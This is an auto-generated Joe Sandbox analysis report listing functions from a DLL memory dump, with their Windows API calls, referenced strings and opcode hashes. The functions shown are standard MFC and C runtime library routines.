Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f3192eb3377bcc566f264aef7450a7b8a93635f05b551d753e5ad24fc90f6c71
Instruction ID: 884f8abea754de309124dd6b0a386a480eb97d6324327e9ce30566a4b2b5d1e7
Opcode Fuzzy Hash: f3192eb3377bcc566f264aef7450a7b8a93635f05b551d753e5ad24fc90f6c71
Instruction Fuzzy Hash: 4E41CF31A087068FD754EF19C88066EB7E2FFC6324F0C896DE88987316D631F8958B91

Function 6FD062D0 Relevance: 1.6, APIs: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FD2C168), ref: 6FD06300

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: bd3fd9a4f7fbfd08baa23b04c99301b051abc7237c59f826276b2ea5bb59371f
Instruction ID: a4e2b7c2de36f48ba12a8417b4f347f5b5ef29eaa0f07ba591aecd558dea1d52
Opcode Fuzzy Hash: bd3fd9a4f7fbfd08baa23b04c99301b051abc7237c59f826276b2ea5bb59371f
Instruction Fuzzy Hash: DF31C031A087068FC754EF19C88066EB7E2FFC6324F09896DE89557316D630F895CB81

Function 6FD0C050 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6FD0C057

Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: ac74f33d6097ed4c06fd5138f65564829909ad52dca787c2e2c5b309ad49d10a
Instruction ID: b168649ccc66d07a2bffa88af6555e9dbc1e223842ba2c863e4562b04e87cdf6
Opcode Fuzzy Hash: ac74f33d6097ed4c06fd5138f65564829909ad52dca787c2e2c5b309ad49d10a
Instruction Fuzzy Hash: 57018835604703CBEBA8BF68881126D36A2AF42324F10842CD552CB2D0DB31F941EB34

Function 6FD060F0 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FD060F6

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: af6a4291a1654461d04bff4a8120f5a0978164dc51907d46cb4f7bb932d00ba8
Instruction ID: e6bce4128bc6622263ffbde531627d11e7e44d20ac9991212d224f1dd8acbcb4
Opcode Fuzzy Hash: af6a4291a1654461d04bff4a8120f5a0978164dc51907d46cb4f7bb932d00ba8
Instruction Fuzzy Hash: DA01FBB1D087019FC718CF0AC89090ABBE6FFC9314F16852DA84897316C730E851CF99

Function 6FD1A6F4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FD14776,00000001,?,?,?,6FD148EF,?,?,?,6FD2E848,0000000C,6FD149AA), ref: 6FD1A709

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 219b35e7ad44f793fe3616627bd9dceacea5b7a18166466d9c925d7a6dbc72cb
Instruction ID: 5f7e23bb1b463f254010eaac0e72fcdef267dfff8b9477e3fc8b28db35860ff5
Opcode Fuzzy Hash: 219b35e7ad44f793fe3616627bd9dceacea5b7a18166466d9c925d7a6dbc72cb
Instruction Fuzzy Hash: D8D02E335487489AEB109F706C087223BEC93823A2F088432FA0CC6080E570E1A0CA04

Non-executed Functions

Function 6FD0748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FD07498
GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FD076D5,?,00000000,?,00000000,00000104,00000000,?,6FD2BEF4,00000000), ref: 6FD074D6

Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4

PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FD07546
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FD0756D
CharUpperW.USER32(00000000), ref: 6FD075A0
FindFirstFileW.KERNEL32(?,?), ref: 6FD075BC
FindClose.KERNEL32(00000000), ref: 6FD075C8
lstrlenW.KERNEL32(?), ref: 6FD075E6

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 9b32a05e6cf2216c0f4f0ff324d808985927eef71fdd12f8cea080963dd0b5eb
Instruction ID: 84c93f5c02dc926cd22eff63cdde5e4d026c27a0684510989a9c9071a506591b
Opcode Fuzzy Hash: 9b32a05e6cf2216c0f4f0ff324d808985927eef71fdd12f8cea080963dd0b5eb
Instruction Fuzzy Hash: C7417271908715ABEF95BF64CC8CBEE7678AF01318F0402D9E9199A190DB35BA94CF60

Function 6FD12932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FD12962

Strings

AfxMDIFrame90su, xrefs: 6FD12A03
AfxFrameOrView90su, xrefs: 6FD12A28
@, xrefs: 6FD12A6E
@, xrefs: 6FD12B07

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: 96b6074642d2bc0ca6168865fbb75f1c3dea0c6ca264b9291959e08e75da891c
Instruction ID: f68ecc45204e7d5cdc1a1e8bb3a02ced3ab8de373794504c8b2b77e249281f31
Opcode Fuzzy Hash: 96b6074642d2bc0ca6168865fbb75f1c3dea0c6ca264b9291959e08e75da891c
Instruction Fuzzy Hash: 4B918271C0430DEFEB80DFA8D585BDEBBF8AF45389F108166E918E6180E775A644C7A0

Function 6FD13F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6FD17C6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FD17C81
UnhandledExceptionFilter.KERNEL32(6FD2A4B8), ref: 6FD17C8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6FD17CA8
TerminateProcess.KERNEL32(00000000), ref: 6FD17CAF

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 413c34e62b3f8b3672493a24e99329ef6dcdd2df9a20376c38966606eb9e4603
Instruction ID: a7d23db29946f90f24fabcbd7d1b13badbd263efb08079cb9911891f31c4d308
Opcode Fuzzy Hash: 413c34e62b3f8b3672493a24e99329ef6dcdd2df9a20376c38966606eb9e4603
Instruction Fuzzy Hash: D021E47A806A06EFFFA0CF18D9457493BB4BB0B324B58411AE60887390DBB174A08B51

Function 6FD089B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FD089FC
__snwprintf_s.LIBCMT ref: 6FD08A2E
LoadLibraryW.KERNEL32(?), ref: 6FD08A69

Part of subcall function 6FD15348: __getptd_noexit.LIBCMT ref: 6FD15348

Strings

LOC, xrefs: 6FD089DC

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: e7753186db12d0ac06b0255ba840d9909f7f775dfc57a1f01c1a47b09e99e732
Instruction ID: 23d136ea46081034d74d016d4dd725874f2eb703dbb7eb112745ffee6197f428
Opcode Fuzzy Hash: e7753186db12d0ac06b0255ba840d9909f7f775dfc57a1f01c1a47b09e99e732
Instruction Fuzzy Hash: 8611B471A59308ABDB91FF78DC45BAE77ACAF02358F400575A210A70C1DB78BA04D7B1

Function 6FD104EE Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FD12C57: GetWindowLongW.USER32(?,000000F0), ref: 6FD12C62

GetKeyState.USER32(00000010), ref: 6FD10514
GetKeyState.USER32(00000011), ref: 6FD1051D
GetKeyState.USER32(00000012), ref: 6FD10526
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FD1053C

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 85940423050d37c72425c347b6c5d1144121f0cddde17c1102d91f8a0865aaae
Instruction ID: fb3eeba1bd53a325889c3c8a1f961c10ab317f42bfa2421573b45dc07a5fb38d
Opcode Fuzzy Hash: 85940423050d37c72425c347b6c5d1144121f0cddde17c1102d91f8a0865aaae
Instruction Fuzzy Hash: E4F0E93674838FA7FA96B7746C49FFD09256F81BD4F0414326745EA0C1DEA0F4224570

Function 6FD0E5F6 Relevance: 3.0, APIs: 2, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 6FD0E61F
CallWindowProcW.USER32(?,?,?,?,?), ref: 6FD0E634

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Window$CallNtdllProcProc_
String ID:
API String ID: 1646280189-0
Opcode ID: 7f23d1b5d6efb71567e6fbb48213a3655d9c9435aba90963c1d45708beadb2a8
Instruction ID: 0a51d18876fea74a4ab1d2198c7f25f21ab7a0b5a5b6f03bbb788b68bb3586b2
Opcode Fuzzy Hash: 7f23d1b5d6efb71567e6fbb48213a3655d9c9435aba90963c1d45708beadb2a8
Instruction Fuzzy Hash: 92F01C36104605FFDF11AFA4DC04D9A7BB9FF49761B088829FA99C6520D732F820EB80

Function 6FD10D95 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f971f8ef528cf85e3fc682910a570427b3fa18ffea986e9eee9225d290567fa7
Instruction ID: 52c159776135a2632ae57c3b0b0925e0ae1f90907c5b0accf459df31c3090c84
Opcode Fuzzy Hash: f971f8ef528cf85e3fc682910a570427b3fa18ffea986e9eee9225d290567fa7
Instruction Fuzzy Hash: 3FF0823204922CFB8F42BF95AD08DCB3B2AEF093A1B009011FA5456450C731F530DBA1

Function 6FD08BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FD08BE9
GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FD08EB7,?,?), ref: 6FD08C19
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FD08C2D
ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C69
ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C77
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FD08C94
ConvertDefaultLocale.KERNEL32(?), ref: 6FD08CBF
ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FD08CC8
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FD08CE1
EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FD08CFE
ConvertDefaultLocale.KERNEL32(?), ref: 6FD08D31
ConvertDefaultLocale.KERNEL32(00000000), ref: 6FD08D3A
GetModuleFileNameW.KERNEL32(6FD00000,?,00000105), ref: 6FD08D7F
_memset.LIBCMT ref: 6FD08D9F

Strings

GetUserDefaultUILanguage, xrefs: 6FD08C21
ntdll.dll, xrefs: 6FD08CDC
GetSystemDefaultUILanguage, xrefs: 6FD08C79
kernel32.dll, xrefs: 6FD08C02

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: f0f6bd3db139789d38ff364b7cb99a0fc85264c2f17fd9a1c29dbad2e4b18d9f
Instruction ID: 51fa8f508208606da06895d71bafca1d0d3fccd788e204ff1f5f779daf3b86c6
Opcode Fuzzy Hash: f0f6bd3db139789d38ff364b7cb99a0fc85264c2f17fd9a1c29dbad2e4b18d9f
Instruction Fuzzy Hash: 7D513E71D152289FDBA0EFA5DC887ADB6B4EF58314F1001E6A448E3280D774AE85CF64

Function 6FD0DCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FD0DE36,?,?,?,?,?,?,?,6FD0FCC6,00000000,00000002,00000028), ref: 6FD0DCF9
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FD0DD15
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FD0DD2A
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FD0DD3B
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FD0DD4C
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FD0DD5D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FD0DD6E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FD0DD8E

Strings

GetSystemMetrics, xrefs: 6FD0DD0F
EnumDisplayMonitors, xrefs: 6FD0DD57
GetMonitorInfoA, xrefs: 6FD0DD88
MonitorFromRect, xrefs: 6FD0DD35
MonitorFromPoint, xrefs: 6FD0DD46
USER32, xrefs: 6FD0DCEF
EnumDisplayDevicesW, xrefs: 6FD0DD68
GetMonitorInfoW, xrefs: 6FD0DD81
MonitorFromWindow, xrefs: 6FD0DD24

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2451437823
Opcode ID: a0abb23eeb2024dfbecdeceb638e9fa0a4d34f9eaecd27d3b9bde017473bc932
Instruction ID: 0e56adce6a3607533145a3b9eb49b7754391286abdf9999027634b6cec439968
Opcode Fuzzy Hash: a0abb23eeb2024dfbecdeceb638e9fa0a4d34f9eaecd27d3b9bde017473bc932
Instruction Fuzzy Hash: AA214F73915B61AFABE07F7888C44AA7BE5B68B22531C463FD305D3108CB7A3056DE61

Function 6FD119AE Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FD119B8

Part of subcall function 6FD0C050: __EH_prolog3.LIBCMT ref: 6FD0C057

CallNextHookEx.USER32(?,?,?,?), ref: 6FD119F8

Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4

_memset.LIBCMT ref: 6FD11A51
GetClassLongW.USER32(?,000000E0), ref: 6FD11A85
SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FD11ADA
GetClassNameW.USER32(?,?,00000100), ref: 6FD11B20
GetWindowLongW.USER32(?,000000FC), ref: 6FD11B46
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FD11B5D
SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FD11B6F
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FD11B77
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FD11B86
SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FD11B94
CallNextHookEx.USER32(?,00000003,?,?), ref: 6FD11BA6
UnhookWindowsHookEx.USER32(?), ref: 6FD11BBA

Strings

AfxOldWndProc423, xrefs: 6FD11B56, 6FD11B5B, 6FD11B6D, 6FD11B75, 6FD11B85
#32768, xrefs: 6FD11A63, 6FD11A68, 6FD11B36

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423
API String ID: 4265692241-2141921550
Opcode ID: 82f6d303f367d9be8373bda24b74c0309ac224cab7d68ecfef1e1bf5c7d3fefa
Instruction ID: 145aa94bf167aec944015ae01ab62fc1d4f7831fe926ae32fa004d865496f36a
Opcode Fuzzy Hash: 82f6d303f367d9be8373bda24b74c0309ac224cab7d68ecfef1e1bf5c7d3fefa
Instruction Fuzzy Hash: 0C51027154872AEBEF61EF24DD48B9A7BBCBF16361F040185F509961C0DB30BA91CBA0

Function 6FD0FBD6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FD12C57: GetWindowLongW.USER32(?,000000F0), ref: 6FD12C62

GetParent.USER32(?), ref: 6FD0FC05
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FD0FC28
GetWindowRect.USER32(?,?), ref: 6FD0FC42
GetWindowLongW.USER32(00000000,000000F0), ref: 6FD0FC58
CopyRect.USER32(?,?), ref: 6FD0FCA5
CopyRect.USER32(?,?), ref: 6FD0FCAF
GetWindowRect.USER32(00000000,?), ref: 6FD0FCB8

Part of subcall function 6FD0DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FD0DED6

CopyRect.USER32(?,?), ref: 6FD0FCD4

Strings

(, xrefs: 6FD0FC6E

Memory Dump Source

Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true

Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd

Similarity

API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
String ID: (
API String ID: 1385303425-3887548279
Opcode ID: b25ed687cd2142af083caad45fc10c7cd8d9f6b0175f43ea353b17e1034d2cf5
Instruction ID: 6f6efdbd48a619f4223d4cf9bc4a6c7a792e73b851ce28a109a3a5bfac833279
Opcode Fuzzy Hash: b25ed687cd2142af083caad45fc10c7cd8d9f6b0175f43ea353b17e1034d2cf5
Instruction Fuzzy Hash: 70516272904619ABDB40EFA8CD85AEEBBB9FF48314F194116E915F7184DB30F901CBA4

Function 6FD1A11F Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FD2E928,0000000C,6FD1A25A,00000000,00000000,?,6FD1A5D4,00000000,00000001,00000000,?,6FD1A89E,00000018,6FD2E978,0000000C), ref: 6FD1A131
__crt_waiting_on_module_handle.LIBCMT ref: 6FD1A13C

Part of subcall function 6FD15BCF: Sleep.KERNEL32(000003E8,00000000,?,6FD1A082,KERNEL32.DLL,?,?,6FD1A416,00000000,?,6FD1488C,00000000,?,?,?,6FD148EF), ref: 6FD15BDB
Part of subcall function 6FD15BCF: GetModuleHandleW.KERNEL32(00000000,?,6FD1A082,KERNEL32.DLL,?,?,6FD1A416,00000000,?,6FD1488C,00000000,?,?,?,6FD148EF,?), ref: 6FD15BE4

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FD1A165
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6FD1A175
__lock.LIBCMT ref: 6FD1A197
InterlockedIncrement.KERNEL32(?), ref: 6FD1A1A4
__lock.LIBCMT ref: 6FD1A1B8
___addlocaleref.LIBCMT ref: 6FD1A1D6

Strings

EncodePointer, xrefs: 6FD1A159
DecodePointer, xrefs: 6FD1A16D
